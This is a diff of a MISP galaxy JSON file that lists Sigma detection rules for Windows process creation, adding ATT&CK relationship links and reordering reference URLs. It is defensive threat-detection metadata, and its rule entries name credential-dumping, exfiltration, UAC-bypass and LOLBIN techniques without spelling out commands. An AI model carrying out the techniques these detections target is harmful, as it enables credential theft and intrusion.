+ "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "6495ae23-3ab4-43c5-a94f-5638a2c31fd2",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "79aeeb41-8156-4fac-a0cd-076495ab82a1",
 "value": "NotPetya Ransomware Activity"
 },
@@ -39175,8 +50151,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://asec.ahnlab.com/en/38156/",
 "https://github.com/fatedier/frp",
+ "https://asec.ahnlab.com/en/38156/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_frp.yml"
 ],
 "tags": [
@@ -39184,6 +50160,15 @@
 "attack.t1090"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "32410e29-5f94-4568-b6a3-d91a8adad863",
 "value": "Fast Reverse Proxy (FRP)"
 },
@@ -39201,9 +50186,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html",
 "https://mgreen27.github.io/posts/2019/05/12/BinaryRename.html",
- "https://attack.mitre.org/techniques/T1036/",
+ "https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_binary.yml"
 ],
 "tags": [
@@ -39211,6 +50195,15 @@
 "attack.t1036.003"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "36480ae1-a1cb-4eaa-a0d6-29801d7e9142",
 "value": "Renamed Binary"
 },
@@ -39227,7 +50220,6 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://attack.mitre.org/techniques/T1196/",
 "https://ired.team/offensive-security/code-execution/code-execution-through-control-panel-add-ins",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_control_panel_item.yml"
 ],
@@ -39239,6 +50231,22 @@
 "attack.t1546"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "4ff5d6a8-c062-4c68-a778-36fc5edd564f",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "b6301b64-ef57-4cce-bb0b-77026f14a8db",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "0ba863e6-def5-4e50-9cea-4dd8c7dc46a4",
 "value": "Control Panel Items"
 },
@@ -39263,6 +50271,15 @@
 "attack.t1059"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "344482e4-a477-436c-aa70-7536d18a48c7",
 "value": "Execution via MSSQL Xp_cmdshell Stored Procedure"
 },
@@ -39280,8 +50297,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://eqllib.readthedocs.io/en/latest/analytics/aed95fc6-5e3f-49dc-8b35-06508613f979.html",
- "https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation",
 "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment",
+ "https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_grabbing_sensitive_hives_via_reg.yml"
 ],
@@ -39293,6 +50310,29 @@
 "car.2013-07-001"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "1ecfdab8-7d59-4c98-95d4-dc41970f57fc",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "6add2ab5-2711-4e9d-87c8-7a0be8531530",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "fd877b94-9bb5-4191-bb25-d79cbd93c167",
 "value": "Grabbing Sensitive Hives via Reg Utility"
 },
@@ -39309,12 +50349,12 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/",
- "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/",
 "https://www.joeware.net/freetools/tools/adfind/",
- "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md",
- "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx",
 "https://thedfirreport.com/2020/05/08/adfind-recon/",
+ "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/",
+ "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md",
+ "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/",
+ "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_adfind_usage.yml"
 ],
 "tags": [
@@ -39325,6 +50365,22 @@
 "attack.t1069.002"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "2aed01ad-3df3-4410-a8cb-11ea4ded587c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "9a132afa-654e-11eb-ae93-0242ac130002",
 "value": "AdFind Usage Detection"
 },
@@ -39341,11 +50397,11 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
+ "https://www.hybrid-analysis.com/search?query=context:74940dcc5b38f9f9b1a0fea760d344735d7d91b610e6d5bd34533dd0153402c5&from_sample=5db135000388385a7644131f&block_redirect=1",
+ "https://blog.alyac.co.kr/1901",
+ "https://www.securitynewspaper.com/2016/11/23/technical-teardown-exploit-malware-hwp-files/",
 "https://en.wikipedia.org/wiki/Hangul_(word_processor)",
 "https://twitter.com/cyberwar_15/status/1187287262054076416",
- "https://blog.alyac.co.kr/1901",
- "https://www.hybrid-analysis.com/search?query=context:74940dcc5b38f9f9b1a0fea760d344735d7d91b610e6d5bd34533dd0153402c5&from_sample=5db135000388385a7644131f&block_redirect=1",
- "https://www.securitynewspaper.com/2016/11/23/technical-teardown-exploit-malware-hwp-files/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hwp_exploits.yml"
 ],
 "tags": [
@@ -39357,6 +50413,22 @@
 "attack.g0032"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "023394c4-29d5-46ab-92b8-6a534c6f447b",
 "value": "Suspicious HWP Sub Processes"
 },
@@ -39381,6 +50453,15 @@
 "attack.t1548"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "e52cb31c-10ed-4aea-bcb7-593c9f4a315b",
 "value": "UAC Bypass via Windows Firewall Snap-In Hijack"
 },
@@ -39405,6 +50486,15 @@
 "attack.t1555.003"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "58a3e6aa-4453-4cc8-a51f-4befe80b31a8",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "d0dae994-26c6-4d2d-83b5-b3c8b79ae513",
 "value": "Launch WebBrowserPassView Executable"
 },
@@ -39445,8 +50535,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/seedworm-apt-iran-middle-east",
 "https://github.com/quarkslab/quarkspwdump",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/seedworm-apt-iran-middle-east",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_quarks_pwdump.yml"
 ],
 "tags": [
@@ -39454,6 +50544,15 @@
 "attack.t1003.002"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "0685b176-c816-4837-8e7b-1216f346636b",
 "value": "Quarks PwDump Usage"
 },
@@ -39478,6 +50577,15 @@
 "attack.t1572"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "4fe28b27-b13c-453e-a386-c2ef362a573b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "f7d7ebd5-a016-46e2-9c54-f9932f2d386d",
 "value": "Suspicious SSH Usage RDP Tunneling"
 },
@@ -39494,9 +50602,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
+ "https://web.archive.org/web/20170715043507/http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html",
 "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Cdb/",
 "https://twitter.com/nas_bench/status/1534957360032120833",
- "https://web.archive.org/web/20170715043507/http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cdb.yml"
 ],
 "tags": [
@@ -39507,6 +50615,29 @@
 "attack.t1127"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "b5c7395f-e501-4a08-94d4-57fe7a9da9d2",
 "value": "WinDbg/CDB LOLBIN Usage"
 },
@@ -39523,8 +50654,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment",
 "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/tutorial-for-ntds-goodness-vssadmin-wmis-ntdsdit-system/",
+ "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shadow_copies_creation.yml"
 ],
 "tags": [
@@ -39534,6 +50665,29 @@
 "attack.t1003.003"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "b17ea6f7-6e90-447e-a799-e6c0a493d6ce",
 "value": "Shadow Copies Creation Using Operating Systems Utilities"
 },
@@ -39558,6 +50712,15 @@
 "attack.t1003.001"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "b1876533-4ed5-4a83-90f3-b8645840a413",
 "value": "SafetyKatz Hack Tool"
 },
@@ -39583,6 +50746,15 @@
 "attack.t1047"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "09af397b-c5eb-4811-b2bb-08b3de464ebf",
 "value": "WMI Reconnaissance List Remote Services"
 },
@@ -39609,6 +50781,15 @@
 "attack.t1218.011"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "3d4aebe0-6d29-45b2-a8a4-3dfde586a26d",
 "value": "Fireball Archer Install"
 },
@@ -39636,6 +50817,22 @@
 "attack.t1218"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "419dbf2b-8a9b-4bea-bf99-7544b050ec8d",
 "value": "Microsoft Workflow Compiler"
 },
@@ -39652,8 +50849,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://lolbas-project.github.io/lolbas/Binaries/Print/",
 "https://twitter.com/Oddvarmoe/status/985518877076541440",
+ "https://lolbas-project.github.io/lolbas/Binaries/Print/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_print.yml"
 ],
 "tags": [
@@ -39661,6 +50858,15 @@
 "attack.t1218"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "bafac3d6-7de9-4dd9-8874-4a1194b493ed",
 "value": "Abusing Print Executable"
 },
@@ -39677,8 +50883,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1124/T1124.md",
 "https://blogs.blackberry.com/en/2022/05/dirty-deeds-done-dirt-cheap-russian-rat-offers-backdoor-bargains",
+ "https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1124/T1124.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_w32tm.yml"
 ],
 "tags": [
@@ -39713,6 +50919,15 @@ "attack.t1059.003" ] }, + "related": [ + { + "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e507feb7-5f73-4ef6-a970-91bb6f6d744f", "value": "Elise Backdoor" }, @@ -39738,6 +50953,15 @@ "attack.t1106" ] }, + "related": [ + { + "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4a12fa47-c735-4032-a214-6fab5b120670", "value": "Lazarus Activity Apr21" }, @@ -39786,6 +51010,15 @@ "attack.t1555.003" ] }, + "related": [ + { + "dest-uuid": "58a3e6aa-4453-4cc8-a51f-4befe80b31a8", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "47147b5b-9e17-4d76-b8d2-7bac24c5ce1b", "value": "Potential Browser Data Stealing" }, @@ -39802,7 +51035,6 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://attack.mitre.org/techniques/T1564/006/", "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/", "https://threatpost.com/maze-ransomware-ragnar-locker-virtual-machine/159350/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_run_virtualbox.yml" @@ -39813,6 +51045,22 @@ "attack.t1564" ] }, + "related": [ + { + "dest-uuid": "b5327dd1-6bf9-4785-a199-25bcbd1f4a9d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "22905430-4901-4c2a-84f6-98243cb173f8", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "bab049ca-7471-4828-9024-38279a4c04da", "value": "Detect Virtualbox Driver Installation OR Starting Of VMs" }, 
@@ -39837,6 +51085,15 @@ "attack.t1588.002" ] }, + "related": [ + { + "dest-uuid": "a2fdce72-04b2-409a-ac10-cc1695f4fce0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "cd764533-2e07-40d6-a718-cfeec7f2da7f", "value": "Renamed SysInternals Debug View" }, @@ -39854,8 +51111,8 @@ "logsource.product": "windows", "refs": [ "https://www.echotrail.io/insights/search/mshta.exe", - "https://en.wikipedia.org/wiki/HTML_Application", "https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/", + "https://en.wikipedia.org/wiki/HTML_Application", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mshta_pattern.yml" ], "tags": [ @@ -39863,6 +51120,15 @@ "attack.t1106" ] }, + "related": [ + { + "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e32f92d1-523e-49c3-9374-bdb13b46a3ba", "value": "Suspicious MSHTA Process Patterns" }, 
@@ -39888,32 +51154,6 @@
 "uuid": "02b64f1b-3f33-4e67-aede-ef3b0a5a8fcf",
 "value": "Potential COM Objects Download Cradles Usage - Process Creation"
 },
- {
- "description": "Detects suspicious encoded character syntax often used for defense evasion",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2020/07/09",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_susp_powershell_encoded_param.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://twitter.com/0gtweet/status/1281103918693482496",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_encoded_param.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059.001",
- "attack.defense_evasion",
- "attack.t1027"
- ]
- },
- "uuid": "e312efd0-35a1-407f-8439-b8d434b438a6",
- "value": "PowerShell Encoded Character Syntax"
- },
 {
 "description": "Detects the use of 3proxy, a tiny free proxy server",
 "meta": {
@@ -39927,8 +51167,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/3proxy/3proxy",
 "https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html",
+ "https://github.com/3proxy/3proxy",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_3proxy_usage.yml"
 ],
 "tags": [
@@ -39936,6 +51176,15 @@
 "attack.t1572"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "4fe28b27-b13c-453e-a386-c2ef362a573b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "f38a82d2-fba3-4781-b549-525efbec8506",
 "value": "3Proxy Usage"
 },
@@ -39952,10 +51201,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://twitter.com/d1r4c/status/1279042657508081664", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file", "https://curl.se/docs/manpage.html", "https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file", - "https://twitter.com/d1r4c/status/1279042657508081664", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_curl_fileupload.yml" ], "tags": [ @@ -39964,6 +51213,22 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "40597f16-0963-4249-bf4c-ac93b7fb9807", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "00bca14a-df4e-4649-9054-3f2aa676bc04", "value": "Suspicious Curl File Upload" }, @@ -39989,6 +51254,15 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "80fc36aa-945e-4181-89f2-2f907ab6775d", "value": "UAC Bypass Using IEInstal - Process" }, 
@@ -40016,6 +51290,22 @@ "attack.t1202" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "90dcf730-1b71-4ae7-9ffc-6fcf62bd0132", "value": "Suspicious ZipExec Execution" }, @@ -40042,6 +51332,29 @@ "attack.t1132.001" ] }, + "related": [ + { + "dest-uuid": "79a4052e-1a89-4b09-aea6-51f1d11fe19c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "1996eef1-ced3-4d7f-bf94-33298cabbf72", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "04fd5427-79c7-44ea-ae13-11b24778ff1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "98a96a5a-64a0-4c42-92c5-489da3866cb0", "value": "DNS Exfiltration and Tunneling Tools Execution" }, @@ -40066,6 +51379,15 @@ "attack.t1219" ] }, + "related": [ + { + "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b6d98a4f-cef0-4abf-bbf6-24132854a83d", "value": "Use of GoToAssist Remote Access Software" }, @@ -40090,6 +51412,15 @@ "attack.t1552.006" ] }, + "related": [ + { + "dest-uuid": "8d7bd4f5-3a89-4453-9c82-2c8894d5655e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "91a2c315-9ee6-4052-a853-6f6a8238f90d", "value": "Findstr GPP Passwords" }, 
@@ -40129,9 +51460,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html", "https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/", "https://guides.lib.umich.edu/c.php?g=282942&p=1885348", + "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_image.yml" ], "tags": [ @@ -40139,6 +51470,15 @@ "attack.t1218.010" ] }, + "related": [ + { + "dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "089fc3d2-71e8-4763-a8a5-c97fbb0a403e", "value": "Suspicious Regsvr32 Execution With Image Extension" }, @@ -40164,6 +51504,15 @@ "attack.t1216" ] }, + "related": [ + { + "dest-uuid": "f6fe9070-7a65-49ea-ae72-76292f42cebe", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9df0dd3a-1a5c-47e3-a2bc-30ed177646a0", "value": "Remote Code Execute via Winrm.vbs" }, @@ -40182,8 +51531,8 @@ "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070/T1070.md", - "https://eqllib.readthedocs.io/en/latest/analytics/c91f422a-5214-4b17-8664-c5fcf115c0a2.html", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn", + "https://eqllib.readthedocs.io/en/latest/analytics/c91f422a-5214-4b17-8664-c5fcf115c0a2.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_fsutil_usage.yml" ], "tags": [ 
@@ -40207,10 +51556,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/SBousseaden/status/1211636381086339073", - "https://www.elastic.co/guide/en/security/current/remote-file-copy-to-a-hidden-share.html", - "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view", + "https://www.elastic.co/guide/en/security/current/remote-file-copy-to-a-hidden-share.html", + "https://twitter.com/SBousseaden/status/1211636381086339073", + "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_copy_lateral_movement.yml" ], "tags": [ @@ -40222,6 +51571,15 @@ "attack.t1021.002" ] }, + "related": [ + { + "dest-uuid": "a19e86f8-1c0a-4fea-8407-23b73d615776", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "855bc8b5-2ae8-402e-a9ed-b889e6df1900", "value": "Copy from Admin Share" }, @@ -40247,6 +51605,15 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "49f2f17b-b4c8-4172-a68b-d5bf95d05130", "value": "UAC Bypass via ICMLuaUtil" }, @@ -40271,6 +51638,15 @@ "attack.t1562.002" ] }, + "related": [ + { + "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c", "value": "SharpEvtMute EvtMuteHook Load" }, 
